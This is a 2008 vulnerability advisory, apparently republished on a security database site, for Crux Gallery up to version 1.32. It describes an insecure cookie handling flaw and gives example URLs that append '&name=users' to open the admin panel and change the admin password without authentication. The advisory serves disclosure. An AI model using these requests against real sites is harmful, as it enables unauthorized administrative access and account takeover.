Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20624
HistorySep 30, 2008 - 12:00 a.m.

Crux Gallery <= 1.32 / Insecure Cookie Handling Vulnerability

2008-09-3000:00:00
vulners.com
22
JSON

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Crux Gallery <= 1.32 / Insecure Cookie Handling Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Program: Crux Gallery
Version: <= 1,32
File affected: admin/*
Download: http://www.arzdev.com/downloads/8/Crux

Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org

>> Program description (by the author website) <<

Crux Gallery reads directories on a server and listes them with thumbnails for
the user to view without useing exrta space for thumbnails or extra bandwidth
for full images. Each image has other resolutions near them for the user to
choose from, including the origional resolution the image is in.

>> Bug <<

You can access to the admin panel altering the cookie and adding a parameter
in the navigation bar.

>> Exploit <<

Note: POST is not checked and you can enter all by GET. Also you can create a
simple perl script to send GET and POST packages.

Navigate by the admin panel adding the parameter '&name=users' in the
navigation bar. Examples:

   to view the main admin panel:
   http://site/index.php?op=admin&amp;name=users

   to change the admin password:
   http://site/index.php?op=pass&amp;name=users
JSON